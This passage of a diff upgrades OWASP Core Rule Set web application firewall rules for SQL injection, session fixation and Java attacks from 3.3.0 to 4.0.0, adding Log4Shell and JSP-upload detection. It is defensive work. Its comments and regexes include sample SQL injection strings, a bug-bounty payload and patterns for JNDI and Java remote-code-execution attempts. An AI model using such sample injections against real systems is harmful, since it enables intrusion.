t:none,t:urlDecodeUni,\ @@ -1378,9 +1766,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1407,9 +1795,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1437,44 +1825,10 @@ SecRule ARGS "@rx \W{4}" \ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}'" - - -# -# This is a sibling of rule 942100 that adds checking of the last path segment. -# -# libinjection is more likely to fail when passing the full path. E.g. the following -# string produces a match: -# 999999.1 union select unhex(hex(version())) -- and 1=1 -# while this doesn't: -# /999999.1 union select unhex(hex(version())) -- and 1=1\. -# Therefore, we capture the last segment of the path and only match that with -# libinjection. Incidentally, the last path segment is also the most likely -# to be used for injection, other segments will most likely not be affected. -# -SecRule REQUEST_BASENAME "@detectSQLi" \ - "id:942101,\ - phase:2,\ - block,\ - capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,\ - msg:'SQL Injection Attack Detected via libinjection',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-sqli',\ - tag:'OWASP_CRS',\ - tag:'capec/1000/152/248/66',\ - tag:'PCI/6.5.2',\ - tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'CRITICAL',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'" # @@ -1505,7 +1859,7 @@ SecRule REQUEST_BASENAME "@detectSQLi" \ # false positives in natural text is still present but lower than this # rule. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:'((?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+\/]{4})+(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=)?)')" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:'(?:(?:[\w\s=_\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)')" \ "id:942511,\ phase:2,\ block,\ @@ -1521,15 +1875,45 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/3',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# Detects '; +# ' Single quote. Used to delineate a query with an unmatched quote. +# ; Terminate a query. A prematurely terminated query creates an error. +# Explanation source: +# https://hwang.cisdept.cpp.edu/swanew/Text/SQL-Injection.htm # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# Bug Bounty example: email=admin@juice-sh.op';&password=foo +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ';" \ + "id:942530,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'SQLi query termination detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # # @@ -1540,7 +1924,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,skipAf SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ "id:942421,\ - phase:2,\ + phase:1,\ block,\ capture,\ t:none,t:urlDecodeUni,\ @@ -1554,9 +1938,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1583,9 +1967,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" diff --git a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf index bec71ba219..3ae7b27ec4 100644 --- a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf +++ b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -42,11 +43,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \ @@ -54,9 +54,9 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'Possible Session Fixation Attack: SessionID Parameter Name with Off-Domain Referer',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{TX.943110_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -64,16 +64,16 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.943110_matched_var_name=%{matched_var_name}',\ chain" - SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)\/" \ + SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)/" \ "capture,\ chain" SecRule TX:1 "!@endsWith %{request_headers.host}" \ "setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \ @@ -81,9 +81,9 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'Possible Session Fixation Attack: SessionID Parameter Name with No Referer',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{TX.943120_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -91,37 +91,37 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.943120_matched_var_name=%{matched_var_name}',\ chain" SecRule &REQUEST_HEADERS:Referer "@eq 0" \ "setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf index 8ae32e13bd..b8b6d1e323 100644 --- a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf +++ b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -12,10 +13,10 @@ # # Many rules check request bodies, use "SecRequestBodyAccess On" to enable it on main modsecurity configuration file. -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # This rule is also triggered by an Apache Struts exploit: # [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/xsscx/cve-2017-5638 ] @@ -35,7 +36,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Suspicious Java class detected',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -46,10 +46,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/xsscx/cve-2017-5638 ] @@ -69,7 +69,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Java process spawn (CVE-2017-9805)',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -80,12 +79,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \ "setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Magic bytes detected and payload included possibly RCE vulnerable classes detected and process execution methods detected # anomaly score set to critical as all conditions indicate the request try to perform RCE. @@ -95,7 +94,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Java serialization (CVE-2015-4852)',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -106,13 +104,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \ - "t:none,t:lowercase,\ - setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + "setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/mazen160/struts-pwn ] @@ -128,8 +125,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES "id:944130,\ phase:2,\ block,\ - t:none,t:lowercase,\ - log,\ + t:none,\ msg:'Suspicious Java class detected',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -140,17 +136,135 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ Java Script Uploads ] +# +# Block file uploads with filenames ending in Java scripts (.jsp, .jspx) +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload +# +# Attackers may use such a vulnerability to achieve remote code execution +# by uploading a script file. If the upload storage location is predictable +# and not adequately protected, the attacker may then request the uploaded +# file and have the code within it executed on the server. +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:jsp|jspx)\.*$" \ + "id:944140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Java Injection Attack: Java Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-injection-java',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Log4J / Log4Shell Defense +# +# This addresses exploits against the Log4J library described in several CVEs: +# * CVE-2021-44228 +# * CVE-2021-44832 +# * CVE-2021-45046 +# * CVE-2021-45105 +# +# See https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/ +# +# This rule attempts to detect two things: +# * Nested use of ${ +# * use of ${jndi:... without the closing bracket +# +# Rule 932130 is also essential for defense since there are certain +# bypasses of the log4j rules that can be caught by 932130. +# +# The payload is not displayed in the alert message since log4j could +# potentially be executed on the logviewer. +# +# This rule has stricter siblings: 944151 (PL2), 944152 (PL4) +# +# Regular expression generated from regex-assembly/944150.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 944150 +# +SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)(?:[^\}]{0,15}(?:\$|$?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)" \ + "id:944150,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:jsDecode,t:htmlEntityDecode,\ + log,\ + msg:'Potential Remote Command Execution: Log4j / Log4shell',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/6',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +# This is a stricter sibling of 944150. +# It is a re-iteration of said rule without the curly bracket distance limiter +# between the nested "${". This is prone to backtracking and therefore a potential +# DoS problem for backtracking regular expression engines (e.g. PCRE2), but it also avoids evasions that fill the space between the nested +# elements with arbitrary data. # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# Regular expression generated from regex-assembly/944151.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 944151 # +SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)(?:[^\}]*(?:\$|$?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)" \ + "id:944151,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:jsDecode,t:htmlEntityDecode,\ + log,\ + msg:'Potential Remote Command Execution: Log4j / Log4shell',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/6',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + # [ Java deserialization vulnerability/Apache Commons (CVE-2015-4852) ] # # Detect exploitation of "Java deserialization" Apache Commons. @@ -168,7 +282,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES "id:944200,\ phase:2,\ block,\ - log,\ msg:'Magic bytes Detected, probable java serialization in use',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -179,10 +292,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + 